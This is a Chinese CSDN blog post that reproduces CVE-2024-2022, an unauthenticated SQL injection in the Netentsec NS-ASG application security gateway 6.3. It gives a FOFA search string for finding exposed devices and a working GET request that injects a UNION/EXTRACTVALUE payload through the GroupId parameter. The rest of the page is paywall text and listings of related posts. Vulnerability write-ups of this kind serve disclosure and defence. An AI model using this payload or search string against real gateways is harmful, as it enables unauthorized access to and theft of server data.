网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-2022)

已于 2024-03-06 17:20:02 修改
阅读量880 收藏 1
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-03-06 17:19:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136511975
版权

0x01 产品简介

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和IPSec,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

0x02 漏洞概述

网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

0x03 影响范围

NS-ASG 应用安全网关 v6.3

0x04 复现环境

FOFA:app="网康科技-NS-ASG安全网关"

0x05 漏洞复现

PoC

GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-2330)
0xSec
03-12 551
​由于网康科技 NS-ASG 应用安全网关/protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤,如下导致输入的语句直接插入到数据库执行造成SQL注入,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-3458、CVE-2024-3457、CVE-2024-3456、CVE-2024-3455)
最新发布
0xSec
04-13 399
网康科技 NS-ASG 应用安全网关 add_ikev2.php、config_ISCGroupNoCache.php、add_postlogin.php、config_Anticrack.php等接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
2021年网络安全设备漏洞集合
weixin_47536169的博客
07-13 3698
360天擎SQL注入漏洞 描述 fofa title="360新天擎" POC & 利用 /api/dp/rptsvcsyncpoint?ccid=1 360天擎信息泄露 描述 /api/dbstat/gettablessize POC & 利用 Alibaba 阿里巴巴Nacos认证绕过 描述 fofa:title="Nacos" POC & EXP # 添加用户 POST /nacos/v1/auth/users HTTP/1.1 ..
网康防火墙前台RCE PoC及漏洞分析
weixin_50464560的博客
09-30 1667
漏洞描述 网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。 这个洞是今年hvv期间爆出来的,危害很高,因此甲方baba要求我做一下分析的工作,好家伙,开局一个漏洞名称,报告内容全靠编,安排。 在网上找一条...
网康上网行为管理
hqmln的博客
11-04 1695
网康上网行为管理是中国第一款专业的硬件上网行为管理产品。为用户提供专业的用户管理、应用控制、网页过滤、内容审计、流量管理和行为分析等功能。可以帮助客户达成上网行为可视、减少安全风险,减少信息泄密、遵从法律法规、提升工作效率、优化带宽资源。ICG广泛应用于政府、金融、能源、教育、运营商、大型企业等领域,帮助单位管理者全面有效的管理上网行为   官网:http://www.netentsec....
网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
wan___she__pi的博客
03-26 637
网康科技NS-ASG 应用安全网关是一种网络设备,旨在保护企业的网络和应用免受各种网络威胁和攻击。它结合了防火墙、入侵检测和防御系统(IDS/IPS)、反病毒、反垃圾邮件、VPN(虚拟专用网络)等功能,提供全面的应用安全保护。网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,造成数据库信息泄露。
漏洞复现网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
weixin_52204925的博客
03-07 849
网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
漏洞复现网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)
weixin_52204925的博客
03-12 1087
由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤,导致输入的语句直接插入到数据库执行造成SQL注入,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞CVE-2024-2022复现
selecthch的博客
03-12 545
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞。FOFA:app="网康-NS-ASG-应用安全网关"网康应用安全网关(NS-ASG)漏洞类别: SQL注入漏洞
terraform-aws-asg:Terraform AWS Auto Scaling堆栈
02-04
先决条件预先配置的AWS VPC要求Terraform 0.8.0或更高版本AWS提供商组模块组模块将提供安全组,启动配置和自动扩展组资源。 ELB和简单组配置均受支持。输入变量资源标签stack_item_fullname此堆栈项目的长格式描述性...
terraform-aws-asg-dns-handler:Terraform模块,用于根据AWS Auto Scaling组中实例上的模式动态设置主机名
02-04
要求 0.12+ 2.0+用法创建一个ASG并设置asg:hostname_pattern标签,例如: asg-test-#instanceid.asg-handler-vpc.testing@Z3QP9GZSRL8IVA可以像这样在Terraform中插值: tag { key = " asg:hostname_pattern
02-AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南-v1.0.pdf
03-17
AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南 核心指导文档
endurox-go:Go应用程序服务器(ASG
03-14
GO应用程序服务器(ASG) 版本:2.0.0-使用对象模式API。 ASG是Golang的应用程序服务器,它可以处理Golang中的分布式事务。 可以在不中断服务的情况下重新加载应用程序组件。 基本上,系统是面向服务的,服务器...
nginx-asg-sync:NGINX Plus与Cloud Autoscaling的集成
02-10
NGINX Plus与Cloud Autoscaling的集成-nginx-asg-sync -asg-sync允许发现云提供商的扩展组的实例(虚拟机)。 支持以下提供程序: AWS Azure 当实例数量改变时,nginx-asg-sync将新实例添加到NGINX Plus配置中,并...
ASG-of-One:AWS Auto Scale一组模板
04-09
一号ASG 一个简单的自动缩放一组的CloudFormation模板。 该模板允许使用引导URL,这是sh的简单管道。 通过提供存储在github / gitlab原始url中的bash脚本(可公共访问),您可以在One的ASG中引导ec2实例。
asg-elb:boltopsproasg-elb的公共文档
02-22
如果您只需要将具有传统EC2实例的负载均衡器部署为高可用性应用程序,则此蓝图很有用。 模板利用了灵活的AWS :: AutoScaling :: AutoScalingGroup MixedInstancesPolicy。 这使您可以使用竞价型,按需或混合实例...
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
07-12
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
Odin部署到AWS的12因子应用程序-Golang开发
05-26
使用Odin轻松安全地将您的12要素应用程序部署到AWS。 Odin是基于步骤框架的AWS步骤功能,该功能将服务作为Auto-Scaling组(ASG)部署到AWS。 Odin Auto-Scaling Group Deployer使用Odin轻松安全地将您的12要素应用...
汇编代码_sub_3E99E3: .asmfunc .asg 0, var_0 .asg -2, var_2 .asg -5, var_5 .asg -6, var_6 .asg -7, var_7 .asg -8, var_8 .asg -9, var_9 .asg -0Ah, var_A .asg -0Bh, var_B .asg -0Ch, var_C .asg -0Dh, var_D .asg -0Eh, var_E .asg -0Fh, var_F .asg -10h, var_10 .asg -11h, var_11 .asg -12h, var_12 addb SP,#20转成C语言应该如何定义变量
07-08
这里假设在汇编代码中使用的 `.asg` 指令是用于定义变量并为其分配内存空间的指令。根据 `.asg` 指令后面的指定值,我们可以确定每个变量的数据类型和相应的大小。请注意,这里将所有的变量都定义为 `char` 类型,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值